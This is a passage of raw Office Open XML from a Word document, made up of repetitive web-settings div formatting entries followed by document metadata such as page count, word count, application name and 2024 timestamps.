        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="67189090">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="236062866">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2046438293">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="366029673">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1988438930">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="451751181">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="316692093">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="525143242">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2133475774">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="540364983">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1803309950">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="708724664">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="498622372">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="733940438">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1206216632">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="741948873">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="969940955">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="877162914">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="110561162">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="878320667">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1610117246">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1022584831">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="509835414">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1262883269">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1282230670">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1580677710">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1348215115">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2088184543">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1436635949">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="172259082">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1481925637">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="991637743">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1679113495">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1180701733">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1743746777">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1431123314">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1756321879">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="599483318">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1801221532">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="257062876">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="1846699252">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="534930775">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2036035351">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1132479579">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2037730814">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="995376309">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2076314034">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1599101738">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="2087996402">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="762995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D4E44-51EE-4087-8AE9-CF46224B06C9}">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BB8A5-33E2-46EA-B50C-7B515283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2253</TotalTime>
  <Pages>21</Pages>
  <Words>4022</Words>
  <Characters>5270</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>239</Lines>
  <Paragraphs>139</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109</cp:revision>
  <cp:lastPrinted>2024-11-17T04:04:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-09-19T13:18:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-17T04:04:00Z</dcterms:modified>
</cp:coreProperties>
</file>